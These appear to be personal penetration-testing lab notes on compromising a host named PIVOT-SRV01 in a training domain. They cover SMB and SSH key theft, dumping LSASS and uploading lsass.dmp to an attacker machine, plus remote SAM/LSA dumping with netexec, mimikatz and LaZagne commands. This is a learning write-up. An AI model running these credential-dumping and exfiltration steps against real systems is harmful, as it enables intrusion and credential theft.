3 - Enum 172.16.5.35 (PIVOT-SRV01)

# Recon - Ping test ![[images/Pasted image 20251023160120.png]] - Light nmap scan ![[images/Pasted image 20251023160051.png]] - ssh, smb, rdp, winrm services open - Detailed nmap scan ![[images/Pasted image 20251023160323.png]] # External Enum of PIVOT-SRV01 ## `Netexec` scans - Try some `nxc` scans with creds - winrm and rdp not working ![[images/Pasted image 20251023160758.png]] - smb not working ![[images/Pasted image 20251023160517.png]] - try with `--local-auth` flag > that works! ![[images/Pasted image 20251023160728.png]] ## SMB Enum - Smbclient to PIVOT-SRV1 ![[images/Pasted image 20251023161034.png]] - Looks like noting in public - SSH priv_key in `\mlefay\.ssh` ![[images/Pasted image 20251023161306.png]] - Grab mlefay's id_rsa ![[images/Pasted image 20251023162008.png]] - Move to loot folder, chmod 600, and rename to keep track ![[images/Pasted image 20251023162033.png]] # Internal Enum of PIVOT-SRV01 - SSH into PIVOT-SRV1 as mlefay - Privkey is password protected ![[images/Pasted image 20251023162213.png]] - Try using earlier password from `for-admin-eyes-only` file - We're in! ## Simple Enum - Light enum ![[images/Pasted image 20251024101359.png]]![[images/Pasted image 20251024101322.png]] - Local admin privs - Access to another subnet: 172.16.6.0/24 ## Dump LSASS - Get LSASS PID![[images/Pasted image 20251024112937.png]] - Dump LSASS ![[images/Pasted image 20251024113520.png]] - Start SMB server on Kali host and move to share ![[images/Pasted image 20251024113848.png]]![[images/Pasted image 20251024113858.png]] - Not working because PIVOT-SRV is on internal subnet - We will need to move to pivot_A first or get `mimikatz` onto PIVOT-SRV01 ### Technique for moving `lsass.dmp` - Setup http.upload server on Kali host - Forward requests from port 4444 on webserver to 8000 on Kali host via the Ligolo tunnel ```bash python3 -m uploadserver ``` - Move `PSUpload.ps1` to PIVOT-SRV01 and use to upload `lsass.dmp` to Kali host ```powershell .\PSUpload.ps1 #if necessary, user "Import-Module" Invoke-FileUpload -Uri http://172.16.5.15/upload -File C:\lsass.dmp ``` - Use `pypykatz` on Kali host to extract HT hashes from `lsass.dmp` ```bash pypykatz lsa minidump lsass.dmp ``` ### Technique for remote grabbing SAM, LSASS, LSA ```bash sudo nxc smb -u mlefay -p <password> -d inlanefreight.local --sam sudo nxc smb -u mlefay -p <password> -d inlanefreight.local --lsa sudo nxc smb -u mlefay -p <password> -d inlanefreight.local -M lsassy ``` ## Mimikatz - Move `mimikatz` onto PIVOT-SRV01 - Transfer `mimikatz.exe` to pivot_A with `scp` ![[images/Pasted image 20251024114357.png]] - Serve up `mimikatz.exe` from pivot_A ![[images/Pasted image 20251024114436.png]] - Download `mimikatz.exe` on PIVOT-SRV01 ![[images/Pasted image 20251024114633.png]] - Run `mimikatz.exe` ![[images/Pasted image 20251024115318.png]] - run `sekurlsa::credman` - New username: vfrank - run `sekrulsa:tickets /export` - run `sekurlsa::minidump C:\path\lsass.dmp` - run `sekurlsa::logonPasswords`![[images/Pasted image 20251024131124.png]] - We have an NT hash and plaintext password for vfrank ## Lazange - Stage `lazagne.exe` on pivot A and move to PIVOTR-SRV01 ![[images/Pasted image 20251024125033.png]] - Run `lazagne.exe` ![[images/Pasted image 20251024130830.png]] - We have an NT hash for new user apendragon - Try using to pth?